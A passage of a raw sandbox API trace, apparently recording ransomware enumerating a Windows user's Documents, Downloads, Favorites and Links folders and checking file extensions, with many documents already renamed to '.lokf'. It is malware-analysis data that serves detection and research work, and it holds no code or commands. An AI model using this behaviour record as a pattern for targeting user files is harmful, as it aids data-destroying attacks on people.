lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0148.233] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned=".ini" [0148.233] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33d387b0, ftCreationTime.dwHighDateTime=0x1d50f0d, ftLastAccessTime.dwLowDateTime=0xce9c1d60, ftLastAccessTime.dwHighDateTime=0x1d56977, ftLastWriteTime.dwLowDateTime=0x2041e0f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x162b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dY6y1t7mu6jrMGEl.pptx.lokf", cAlternateFileName="DY6Y1T~1.LOK")) returned 1 [0148.233] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dY6y1t7mu6jrMGEl.pptx.lokf") returned=".lokf" [0148.234] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef941140, ftCreationTime.dwHighDateTime=0x1d585b9, ftLastAccessTime.dwLowDateTime=0x5e581db0, ftLastAccessTime.dwHighDateTime=0x1d59172, ftLastWriteTime.dwLowDateTime=0x20444250, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xba1a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e3Nt7XYdwW.docx.lokf", cAlternateFileName="E3NT7X~1.LOK")) returned 1 [0148.234] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e3Nt7XYdwW.docx.lokf") returned=".lokf" [0148.234] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437af540, ftCreationTime.dwHighDateTime=0x1d593ab, ftLastAccessTime.dwLowDateTime=0xb77094b0, ftLastAccessTime.dwHighDateTime=0x1d51a42, ftLastWriteTime.dwLowDateTime=0x2046a3b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x11f3d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fyZw8q.pptx.lokf", cAlternateFileName="FYZW8Q~1.LOK")) returned 1 [0148.234] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fyZw8q.pptx.lokf") returned=".lokf" [0148.234] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8c76720, ftCreationTime.dwHighDateTime=0x1d5443c, ftLastAccessTime.dwLowDateTime=0xbddb4e60, ftLastAccessTime.dwHighDateTime=0x1d58d3f, ftLastWriteTime.dwLowDateTime=0x2046a3b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x125a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iY-CcZnqhK2oNX.xlsx.lokf", cAlternateFileName="IY-CCZ~1.LOK")) returned 1 [0148.234] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iY-CcZnqhK2oNX.xlsx.lokf") returned=".lokf" [0148.234] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x109f0170, ftCreationTime.dwHighDateTime=0x1d50a5d, ftLastAccessTime.dwLowDateTime=0xdbe66a50, ftLastAccessTime.dwHighDateTime=0x1d513ca, ftLastWriteTime.dwLowDateTime=0x20490510, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x17746, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jcZ5HOv.docx.lokf", cAlternateFileName="JCZ5HO~1.LOK")) returned 1 [0148.234] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jcZ5HOv.docx.lokf") returned=".lokf" [0148.234] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49d48050, ftCreationTime.dwHighDateTime=0x1d544aa, ftLastAccessTime.dwLowDateTime=0x89941f80, ftLastAccessTime.dwHighDateTime=0x1d52366, ftLastWriteTime.dwLowDateTime=0x20490510, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1b87, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jFhfFrSxF58Y6JuYP.pptx.lokf", cAlternateFileName="JFHFFR~1.LOK")) returned 1 [0148.234] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jFhfFrSxF58Y6JuYP.pptx.lokf") returned=".lokf" [0148.234] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x625aa6a0, ftCreationTime.dwHighDateTime=0x1d4d366, ftLastAccessTime.dwLowDateTime=0x7a991140, ftLastAccessTime.dwHighDateTime=0x1d4c559, ftLastWriteTime.dwLowDateTime=0x204b6670, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x7034, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lJq7q-PX9DWbR8t8z.doc.lokf", cAlternateFileName="LJQ7Q-~1.LOK")) returned 1 [0148.234] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lJq7q-PX9DWbR8t8z.doc.lokf") returned=".lokf" [0148.234] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0148.234] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0148.234] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x20953110, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20953110, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0148.234] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0148.234] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x20a83c10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20a83c10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0148.234] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c774d20, ftCreationTime.dwHighDateTime=0x1d4c565, ftLastAccessTime.dwLowDateTime=0xa9288bc0, ftLastAccessTime.dwHighDateTime=0x1d4cf5a, ftLastWriteTime.dwLowDateTime=0x204dc7d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xda66, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="q_n6bOaeAdhkjfo2mhI.docx.lokf", cAlternateFileName="Q_N6BO~1.LOK")) returned 1 [0148.234] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\q_n6bOaeAdhkjfo2mhI.docx.lokf") returned=".lokf" [0148.234] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf303f550, ftCreationTime.dwHighDateTime=0x1d4ca59, ftLastAccessTime.dwLowDateTime=0x20acfed0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20acfed0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R4I1Q ij0VYYLZ2qE", cAlternateFileName="R4I1QI~1")) returned 1 [0148.234] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb20c760, ftCreationTime.dwHighDateTime=0x1d4c857, ftLastAccessTime.dwLowDateTime=0xd03060c0, ftLastAccessTime.dwHighDateTime=0x1d4cede, ftLastWriteTime.dwLowDateTime=0x204dc7d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xe27a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SfzjItAk.ots.lokf", cAlternateFileName="SFZJIT~1.LOK")) returned 1 [0148.234] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SfzjItAk.ots.lokf") returned=".lokf" [0148.235] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x946fcb80, ftCreationTime.dwHighDateTime=0x1d55673, ftLastAccessTime.dwLowDateTime=0x65181a70, ftLastAccessTime.dwHighDateTime=0x1d56499, ftLastWriteTime.dwLowDateTime=0x20502930, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xb13b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tfEuvyompjnimS.xlsx.lokf", cAlternateFileName="TFEUVY~1.LOK")) returned 1 [0148.235] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tfEuvyompjnimS.xlsx.lokf") returned=".lokf" [0148.235] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x662fcdf0, ftCreationTime.dwHighDateTime=0x1d5283e, ftLastAccessTime.dwLowDateTime=0xa97b4c40, ftLastAccessTime.dwHighDateTime=0x1d565df, ftLastWriteTime.dwLowDateTime=0x20502930, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1680d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uvaDFzE.docx.lokf", cAlternateFileName="UVADFZ~1.LOK")) returned 1 [0148.235] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uvaDFzE.docx.lokf") returned=".lokf" [0148.235] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70150a40, ftCreationTime.dwHighDateTime=0x1d54e8d, ftLastAccessTime.dwLowDateTime=0x332545c0, ftLastAccessTime.dwHighDateTime=0x1d52497, ftLastWriteTime.dwLowDateTime=0x20528a90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xa774, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vShBQE5akxJRPT.pptx.lokf", cAlternateFileName="VSHBQE~1.LOK")) returned 1 [0148.235] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vShBQE5akxJRPT.pptx.lokf") returned=".lokf" [0148.235] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66db64a0, ftCreationTime.dwHighDateTime=0x1d530ac, ftLastAccessTime.dwLowDateTime=0xb8a094e0, ftLastAccessTime.dwHighDateTime=0x1d518b0, ftLastWriteTime.dwLowDateTime=0x20528a90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x99d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Xe72pRvBTnt.docx.lokf", cAlternateFileName="XE72PR~1.LOK")) returned 1 [0148.235] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Xe72pRvBTnt.docx.lokf") returned=".lokf" [0148.235] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66556860, ftCreationTime.dwHighDateTime=0x1d4cedb, ftLastAccessTime.dwLowDateTime=0x20b8e5b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20b8e5b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xw_W- RtiM1Q0r", cAlternateFileName="XW_W-R~1")) returned 1 [0148.235] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66556860, ftCreationTime.dwHighDateTime=0x1d4cedb, ftLastAccessTime.dwLowDateTime=0x20b8e5b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20b8e5b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xw_W- RtiM1Q0r", cAlternateFileName="XW_W-R~1")) returned 0 [0148.235] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.235] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.235] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.235] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="Downloads\\" [0148.235] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.235] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.235] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.235] PathFindFileNameW (pszPath="") returned="" [0148.235] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.235] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.236] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0148.236] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned=".ini" [0148.236] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0148.236] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.236] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.236] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.236] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0148.236] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.236] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.236] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.236] PathFindFileNameW (pszPath="") returned="" [0148.236] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.236] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.236] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0148.236] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned=".ini" [0148.236] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20bda870, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20bda870, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0148.236] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20c4cc90, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20c4cc90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0148.236] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20ce5210, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20ce5210, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0148.236] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20d57630, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20d57630, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0148.236] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20d57630, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20d57630, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0148.237] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.237] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.237] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.237] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="Links\\" [0148.237] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.237] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.237] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.237] PathFindFileNameW (pszPath="") returned="" [0148.237] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.237] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.237] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0148.237] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned=".ini" 